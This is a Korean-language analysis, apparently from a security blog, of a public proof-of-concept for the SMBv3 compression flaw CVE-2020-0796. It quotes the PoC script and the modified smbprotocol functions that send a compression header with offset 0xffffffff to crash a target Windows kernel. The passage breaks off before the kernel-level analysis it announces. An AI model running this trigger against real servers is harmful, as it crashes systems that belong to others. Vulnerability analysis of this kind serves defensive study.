[0x00] Overview
우선 분석을 위해 실제 커널에서 충돌을 일으킬 수 있는 PoC 코드를 확인하였습니다.
- https://github.com/eerykitty/CVE-2020-0796-POC
넌 페이지드 영역에서 페이지 폴트가 발생하여 버그 체크가 발생했습니다. 즉 유효하지 않은 주소에 접근을 하여 버그체크가 발생했습니다. 아래에서 PoC 코드 내용을 분석해보겠습니다.
[0x01] PoC Script Analysis
해당 코드를 열어보면 smbclient
모듈을 이용합니다.
#!/usr/bin/env python3
from smbclient import (
link,
open_file,
remove,
register_session,
stat,
symlink,
)
import sys
if len(sys.argv) < 2:
print("usage: ./CVE-2020-0796.py servername")
sys.exit(1)
register_session(sys.argv[1], username="fakeusername",
password="password", encrypt=False) # encryption must be disabled
register_session
함수는 smbclient
내 _pool.py
에 정의되어 있습니다.
def register_session(server, username=None, password=None, port=445, encrypt=None, connection_timeout=60):
"""
Creates an active connection and session to the server specified. This can be manually called to register the
credentials of a specific server instead of defining it on the first function connecting to the server. The opened
connection is registered in a pool and re-used if a connection is made to the same server with the same
credentials.
:param server: The server name to register.
:param username: Optional username to connect with. Required if no session has been registered for the server and
Kerberos auth is not being used.
:param password: Optional password to connect with.
:param port: The port to connect with.
:param encrypt: Whether to force encryption or not, once this has been set to True the session cannot be changed
back to False.
:param connection_timeout: Override the timeout used for the initial connection.
:return: The Session that was registered or already existed in the pool.
"""
connection_key = "%s:%s" % (server, port)
global _SMB_CONNECTIONS
connection = _SMB_CONNECTIONS.get(connection_key, None)
if not connection:
connection = Connection(_CLIENT_GUID, server, port)
connection.connect(timeout=connection_timeout)
_SMB_CONNECTIONS[connection_key] = connection
# Find the first session in the connection session list that match the username specified, if not username then
# just use the first session found or fall back to creating a new one with implicit auth/kerberos.
session = next((s for s in connection.session_table.values() if username is None or s.username == username), None)
if not session:
session = Session(connection, username=username, password=password, require_encryption=(encrypt is True))
session.connect()
elif encrypt is not None:
# We cannot go from encryption to no encryption on an existing session but we can do the opposite.
if session.encrypt_data and not encrypt:
raise ValueError("Cannot disable encryption on an already negotiated session.")
elif not session.encrypt_data and encrypt:
session.encrypt = True
return session
위와 같은 코드로 정의되어 있으며, session.py
내부에 connect()
를 따라 추적하면 connection.py
내에 _send
함수를 만날 수 있습니다.
def _send(self, messages, session_id=None, tree_id=None, message_id=None, credit_request=None, related=False,
async_id=None):
send_data = b""
requests = []
session = self.session_table.get(session_id, None)
tree = None
if tree_id and session:
if tree_id not in session.tree_connect_table:
raise SMBException("Cannot find Tree with the ID %d in the session tree table" % tree_id)
tree = session.tree_connect_table[tree_id]
total_requests = len(messages)
for i, message in enumerate(messages):
if i == total_requests - 1:
next_command = 0
padding = b""
else:
# each compound message must start at the 8-byte boundary
msg_length = 64 + len(message)
mod = msg_length % 8
padding_length = 8 - mod if mod > 0 else 0
next_command = msg_length + padding_length
padding = b"\x00" * padding_length
# When running with multiple threads we need to ensure that getting the message id and adjusting the
# sequence windows is done in a thread safe manner so we use a lock to ensure only 1 thread accesses the
# sequence window at a time.
with self.sequence_lock:
sequence_window_low = self.sequence_window['low']
sequence_window_high = self.sequence_window['high']
credit_charge = self._calculate_credit_charge(message)
credits_available = sequence_window_high - sequence_window_low
if credit_charge > credits_available:
raise SMBException("Request requires %d credits but only %d credits are available"
% (credit_charge, credits_available))
current_id = message_id or sequence_window_low
if message.COMMAND != Commands.SMB2_CANCEL:
self.sequence_window['low'] += credit_charge if credit_charge > 0 else 1
if async_id is None:
header = SMB2HeaderRequest()
header['tree_id'] = tree_id or 0
else:
header = SMB2HeaderAsync()
header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_ASYNC_COMMAND)
header['async_id'] = async_id
header['credit_charge'] = credit_charge
header['command'] = message.COMMAND
header['credit_request'] = credit_request if credit_request else credit_charge
header['message_id'] = current_id
header['session_id'] = session_id or 0
header['data'] = message.pack()
header['next_command'] = next_command
if i != 0 and related:
header['session_id'] = b"\xff" * 8
header['tree_id'] = b"\xff" * 4
header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_RELATED_OPERATIONS)
if session and session.signing_required and session.signing_key:
header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_SIGNED)
b_header = header.pack() + padding
signature = self._generate_signature(b_header, session.signing_key)
# To save on unpacking and re-packing, manually adjust the signature and update the request object for
# back-referencing.
b_header = b_header[:48] + signature + b_header[64:]
header['signature'] = signature
else:
b_header = header.pack() + padding
send_data += b_header
if message.COMMAND == Commands.SMB2_CANCEL:
request = self.outstanding_requests[header['message_id'].get_value()]
else:
request = Request(header, type(message), self, session_id=session_id)
self.outstanding_requests[header['message_id'].get_value()] = request
requests.append(request)
if related:
requests[0].related_ids = [r.message['message_id'].get_value() for r in requests][1:]
global g_count
g_count += 1
if g_count == 3: # send the bad offset after the server asks for creds
send_data = self._compress(send_data, session)
if session and session.encrypt_data or tree and tree.encrypt_data:
send_data = self._encrypt(send_data, session)
self.transport.send(send_data)
return requests
하단의 코드를 살펴보면 제작자가 g_count
라는 전역변수를 통해 조건을 설정해두었고 세션을 맺으면 _compress
함수를 호출 후 패킷을 전달합니다.
def _compress(self, b_data, session):
header = SMB2CompressionTransformHeader()
header['original_size'] = len(b_data)
header['offset'] = 4294967295
header['data'] = smbprotocol.lznt1.compress(b_data)
return header
위와 같은 코드로 이루어져있으며, 제작자는 오프셋의 값을 4294967295(0xffffffff)으로 설정하여 전송합니다. 약간의 코드를 수정하여 다음과 같은 패킷을 볼 수 있습니다.
본격적으로 커널단에서 어떻게 동작하는지 확인하도록 하겠습니다. 전체 패킷은 아래에 있습니다.